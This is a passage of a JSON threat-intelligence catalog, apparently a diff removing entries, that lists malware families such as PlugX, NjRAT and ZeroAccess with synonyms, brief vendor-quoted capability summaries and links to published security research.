"https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", - "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", - "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", - "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", - "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" - ] - } - }, - { - "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", - "value": "Heloag", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", - "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" - ] - } - }, - { - "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", - "value": "Ploutus ATM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", - "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" - ] - } - }, - { - "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", - "value": "Cryakl", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", - "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", - "https://hackmag.com/security/ransomware-russian-style/", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx" - ] - } - }, - { - "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", - "value": "DMA Locker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", - "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", - "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" - ] - } - }, - { - "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", - "value": "Computrace", - "description": "", - "meta": { - "synonyms": [ - "lojack" - ], - "type": [], - "refs": [ - "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", - "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", - "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", - "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research" - ] - } - }, - { - "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", - "value": "KasperAgent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" - ] - } - }, - { - "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", - "value": "Chir", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", - "value": "FindPOS", - "description": "", - "meta": { - "synonyms": [ - "Poseidon" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", - "https://blogs.cisco.com/security/talos/poseidon" - ] - } - }, - { - "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", - "value": "WebC2-Yahoo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", - "value": "CukieGrab", - "description": "", - "meta": { - "synonyms": [ - "Roblox Trade Assist" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" - ] - } - }, - { - "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", - "value": "Stampedo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" - ] - } - }, - { - "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", - "value": "Bredolab", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", - "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" - ] - } - }, - { - "uuid": "d1298818-6425-49be-9764-9f119d964efd", - "value": "GoogleDrive RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" - ] - } - }, - { - "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", - "value": "ReactorBot", - "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", - "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html" - ] - } - }, - { - "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", - "value": "HTran", - "description": "", - "meta": { - "synonyms": [ - "HUC Packet Transmit Tool" - ], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", - "https://www.secureworks.com/research/htran" - ] - } - }, - { - "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", - "value": "NjRAT", - "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", - "meta": { - "synonyms": [ - "Bladabindi" - ], - "type": [], - "refs": [ - "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", - "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", - "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services" - ] - } - }, - { - "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", - "value": "Tidepool", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", - "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/" - ] - } - }, - { - "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", - "value": "ZeroAccess", - "description": "", - "meta": { - "synonyms": [ - "Max++", - "Smiscer" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", - "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", - "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", - "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", - "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", - "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" - ] - } - }, - { - "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", - "value": "Micropsia", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "http://blog.talosintelligence.com/2017/06/palestine-delphi.html" - ] - } - }, - { - "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", - "value": "PlugX", - "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", - "meta": { - "synonyms": [ - "Korplug" - ], - "type": [], - "refs": [ - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://community.rsa.com/thread/185439", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", - "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" - ] - } - }, - { - "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", - "value": "ChewBacca", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" - ] - } - }, - { - "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", - "value": "Contopee", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" - ] - } - }, - { - "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", - "value": "Asprox", - "description": "", - "meta": { - "synonyms": [ - "Aseljo", - "BadSrc" - ], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/", - "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/" - ] - } - }, - { - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - } - }, - { - "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", - "value": "NewCT", - "description": "", - "meta": { - "synonyms": [ - "CT" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" - ] - } - }, - { - "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", - "value": "CrossRAT", - "description": "", - "meta": { - "synonyms": [ - "Trupto" - ], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x28.html", - "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" - ] - } - }, - { - "uuid": "3760920e-4d1a-40d8-9e60-508079499076", - "value": "Neutrino", - "description": "", - "meta": { - "synonyms": [ - "Kasidet" - ], - "type": [], - "refs": [ - "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/", - "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", - "http://securitykitten.github.io/an-evening-with-n3utrino/", - "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", - "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", - "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", - "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex" - ] - } - }, - { - "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", - "value": "CryptoRansomeware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/818369717371027456" - ] - } - }, - { - "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", - "value": "DROPSHOT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/" - ] - } - }, - { - "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", - "value": "BYEBY", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" - ] - } - }, - { - "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", - "value": "PrincessLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", - "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/" - ] - } - }, - { - "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", - "value": "MAPIget", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "06ffb614-33ca-4b04-bf3b-623e68754184", - "value": "AnubisSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/" - ] - } - }, - { - "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", - "value": "Unidentified 006", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d9255166-79b3-49af-b676-c07fa9303d7e", - "value": "Winnti", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://401trg.pw/winnti-evolution-going-open-source/", - " https://401trg.pw/an-update-on-winnti/" - ] - } - }, - { - "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", - "value": "JackPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" - ] - } - }, - { - "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", - "value": "OmniRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", - "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" - ] - } - }, - { - "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", - "value": "Filecoder", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/877811773826641920" - ] - } - }, - { - "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", - "value": "Popcorn Time", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malwrhunterteam/status/806595092177965058" - ] - } - }, - { - "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", - "value": "ShellBind", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" - ] - } - }, - { - "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", - "value": "Serpico", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", - "value": "Rakos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" - ] - } - }, - { - "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", - "value": "ISMAgent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/ismagent/" - ] - } - }, - { - "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", - "value": "Chthonic", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan" - ] - } - }, - { - "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", - "value": "Casper", - "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" - ] - } - }, - { - "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", - "value": "Hancitor", - "description": "", - "meta": { - "synonyms": [ - "Chanitor" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" - ] - } - }, - { - "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", - "value": "Turla RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", - "value": "PittyTiger RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", - "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/" - ] - } - }, - { - "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", - "value": "Silence", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.intezer.com/silenceofthemoles/", - "https://securelist.com/the-silence/83009/" - ] - } - }, - { - "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", - "value": "w32times", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://attack.mitre.org/wiki/Group/G0022" - ] - } - }, - { - "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", - "value": "Kurton", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", - "value": "MiniASP", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", - "value": "Globe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", - "value": "Zeus SSL", - "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample.", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", - "value": "EvilOSX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Marten4n6/EvilOSX", - "https://twitter.com/JohnLaTwC/status/966139336436498432" - ] - } - }, - { - "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", - "value": "CryptoNight", - "description": "WebAssembly-based crpyto miner.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", - "https://twitter.com/JohnLaTwC/status/983011262731714565" - ] - } - }, - { - "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", - "value": "GlooxMail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", - "value": "Harnig", - "description": "", - "meta": { - "synonyms": [ - "Piptea" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", - "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" - ] - } - }, - { - "uuid": "16794655-c0e2-4510-9169-f862df104045", - "value": "Bugat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", - "value": "XBot POS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" - ] - } - }, - { - "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", - "value": "ATMii", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" - ] - } - }, - { - "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", - "value": "jSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" - ] - } - }, - { - "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", - "value": "Salgorea", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" - ] - } - }, - { - "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", - "value": "Alureon", - "description": "", - "meta": { - "synonyms": [ - "TDL", - "Olmarik", - "TDSS", - "Pihar" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", - "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" - ] - } - }, - { - "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", - "value": "SSHDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" - ] - } - }, - { - "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", - "value": "QHost", - "description": "", - "meta": { - "synonyms": [ - "Tolouge" - ], - "type": [], - "refs": [] - } - }, - { - "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", - "value": "Mangzamel", - "description": "", - "meta": { - "synonyms": [ - "junidor", - "mengkite", - "vedratve" - ], - "type": [], - "refs": [ - "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" - ] - } - }, - { - "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", - "value": "Punkey POS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", - "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" - ] - } - }, - { - "uuid": "82733125-da67-44ff-b2ac-b16226088211", - "value": "ONHAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" - ] - } - }, - { - "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", - "value": "Remexi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" - ] - } - }, - { - "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", - "value": "Velso Ransomware", - "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" - ] - } - }, - { - "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", - "value": "Pykspa", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", - "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", - "https://www.youtube.com/watch?v=HfSQlC76_s4" - ] - } - }, - { - "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", - "value": "DistTrack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", - "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", - "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" - ] - } - }, - { - "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", - "value": "PAS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", - "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" - ] - } - }, - { - "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", - "value": "BTCWare", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" - ] - } - }, - { - "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", - "value": "AVCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" - 